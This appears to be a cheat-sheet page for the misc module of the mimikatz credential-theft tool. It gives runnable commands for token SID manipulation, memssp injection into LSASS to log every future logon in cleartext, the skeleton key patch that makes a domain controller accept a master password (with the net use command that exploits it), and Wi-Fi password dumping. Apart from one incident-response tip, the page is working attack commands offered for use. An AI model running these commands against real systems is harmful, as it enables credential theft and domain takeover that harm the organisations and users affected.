misc
Miscellaneous mimikatz commands for launching processes, system manipulation, and specialized attacks.
cmd β Spawn cmd.exe
Launch a command prompt with current privilege context.
mimikatz # misc::cmd
regedit β Launch Registry Editor
Open the registry editor with mimikatz token context.
mimikatz # misc::regedit
taskmgr β Launch Task Manager
mimikatz # misc::taskmgr
addsid β Add SID to Token
Add a SID to the current token's extra SIDs. Used for privilege manipulation.
mimikatz # misc::addsid <sid>
memssp β Memory SSP Injection
Inject a Security Support Provider (SSP) into LSASS memory to capture all future logon credentials in cleartext. Credentials are written to C:\Windows\System32\mimilsa.log.
mimikatz # misc::memssp
Persistent credential capture β all future logons (interactive, service, network) are logged to the file until LSASS is restarted.
skeleton β Skeleton Key Attack
Patch LSASS to accept a master password (mimikatz) for all domain accounts while still allowing existing passwords to work. Affects only the patched DC.
mimikatz # misc::skeleton
After injection, any user can authenticate with either their real password OR mimikatz:
net use \\<dc>\C$ /user:<domain>\<username> mimikatz
Does NOT survive reboot β LSASS is patched in memory only.
wifi β Dump Wi-Fi Passwords
Extract saved Wi-Fi credentials.
mimikatz # misc::wifi
detours β API Hooking
Manipulate API calls via Microsoft Detours.
mimikatz # misc::detours
ncroutemon β NCRoute Monitor
mimikatz # misc::ncroutemon
Notes
misc::memsspis a persistence technique β monitor for newmimilsa.logcreation in incident responsemisc::skeletonrequires LSASS patching (privilege::debug first) and leaves the DC in a modified state- Neither
memsspnorskeletonsurvive reboots β they are in-memory only - For
memssp, collect logs:type C:\Windows\System32\mimilsa.log